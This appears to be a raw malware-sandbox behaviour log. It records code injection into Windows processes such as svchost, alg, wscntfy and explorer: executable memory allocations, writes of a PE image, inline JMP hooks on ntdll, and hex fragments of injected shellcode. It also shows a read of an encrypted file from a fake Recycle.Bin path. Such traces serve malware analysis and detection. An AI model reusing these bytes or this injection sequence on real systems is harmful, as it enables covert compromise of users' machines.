Memory attributes changed PID: 448 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2038074233
Memory written PID: 448 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 15 84 success or wait 2038117770
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2038118478
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2038120658
Memory allocated PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2038123722
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2038124754
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2038125567
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2038125757
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2038135134
Memory written PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2041016773
System info queried Type: BasicInformation success or wait 2041019904
Thread delayed Time: 0 TID: 4214 success or wait 2041020048
Thread delayed Time: 0 TID: 4214 success or wait 2041020499
Thread delayed Time: 0 TID: 4214 success or wait 2041022995
System info queried Type: ProcessorInformation success or wait 2041024029
Thread delayed Time: 0 TID: 4214 success or wait 2041024563
Memory written PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2041067745
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2041068346
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB7F2F8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2041069157
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2041070228
Memory allocated PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 10A0000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2041070796
System info queried Type: BasicInformation success or wait 2041071206
System info queried Type: BasicInformation success or wait 2041071330
System info queried Type: ProcessorInformation success or wait 2041071725
System info queried Type: ProcessorInformation success or wait 2041072024
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2041072616
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2041073364
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2041076586
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2041077292
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2041079481
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2041079645
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2041080040
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2041080232
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2041082660
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2041083478
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2041085180
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2041085850
System info queried Type: BasicInformation success or wait 2041087060
System info queried Type: BasicInformation success or wait 2041087211
System info queried Type: ProcessorInformation success or wait 2041087685
System info queried Type: ProcessorInformation success or wait 2041088533
Memory written PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 10A0000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2041107593
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2041109226
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB7CF58 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2041110047
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2041110573
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2041111172
Memory written PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 79 84 success or wait 2041123675
System info queried Type: BasicInformation success or wait 2041124372
System info queried Type: ProcessorInformation success or wait 2041125771
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2041127385
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2041129561
Memory allocated PID: 1988 Path: C:\WINDOWS\system32\alg.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2041130005
Memory attributes changed PID: 1988 Path: C:\WINDOWS\system32\alg.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2041130652
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2041131124
Memory attributes changed PID: 1988 Path: C:\WINDOWS\system32\alg.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2041131285
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2041131754
Memory attributes changed PID: 1988 Path: C:\WINDOWS\system32\alg.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2041132330
Memory written PID: 1988 Path: C:\WINDOWS\system32\alg.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2042278152
Thread delayed Time: 0 TID: 4214 success or wait 2042279538
Thread delayed Time: 0 TID: 4214 success or wait 2042279641
Thread delayed Time: 0 TID: 4214 success or wait 2042280976
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2042281151
Memory written PID: 1988 Path: C:\WINDOWS\system32\alg.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2042298213
Thread delayed Time: 0 TID: 4214 success or wait 2042303460
Memory allocated PID: 1988 Path: C:\WINDOWS\system32\alg.exe Base: 990000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2042304362
System info queried Type: BasicInformation success or wait 2042304748
System info queried Type: ProcessorInformation success or wait 2042305148
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2042305234
System info queried Type: BasicInformation success or wait 2042305936
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2042306217
System info queried Type: ProcessorInformation success or wait 2042306602
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2042306895
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2042307381
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2042307856
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2042308084
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB90168 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2042308130
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2042308728
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2042310078
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2042310803
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2042310990
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2042314924
System info queried Type: BasicInformation success or wait 2042316430
System info queried Type: ProcessorInformation success or wait 2042316577
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2042317292
System info queried Type: BasicInformation success or wait 2042317524
System info queried Type: ProcessorInformation success or wait 2042318140
Memory written PID: 1988 Path: C:\WINDOWS\system32\alg.exe Base: 990000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2042342459
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2042342697
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2042343286
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 4 Value: D8 00 00 00 success or wait 2042343635
Memory attributes changed PID: 1988 Path: C:\WINDOWS\system32\alg.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2042343806
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2042343979
Memory written PID: 1988 Path: C:\WINDOWS\system32\alg.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 08 84 success or wait 2042365660
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 20 Value: 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2042366031
Memory allocated PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2042367183
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2042367568
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 2042367653
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2042368077
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 2042368408
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2042368699
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2042369001
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2042369067
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2042369296
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2042954627
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2042976636
System info queried Type: BasicInformation success or wait 2042976929
System info queried Type: ProcessorInformation success or wait 2042977157
Memory allocated PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: AE0000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2042977219
System info queried Type: BasicInformation success or wait 2042977637
System info queried Type: ProcessorInformation success or wait 2042977989
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2042978645
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2042978703
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB7C210 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2042978923
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2042979281
System info queried Type: BasicInformation success or wait 2042979756
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2042979813
System info queried Type: ProcessorInformation success or wait 2042979996
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2042980298
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2042980503
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2042980832
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2042981393
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2042981685
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2042981947
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2042982211
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2042982420
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2042982638
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2042982725
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2042983062
System info queried Type: BasicInformation success or wait 2042983563
System info queried Type: ProcessorInformation success or wait 2042983749
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2042983803
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2042984507
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2042984749
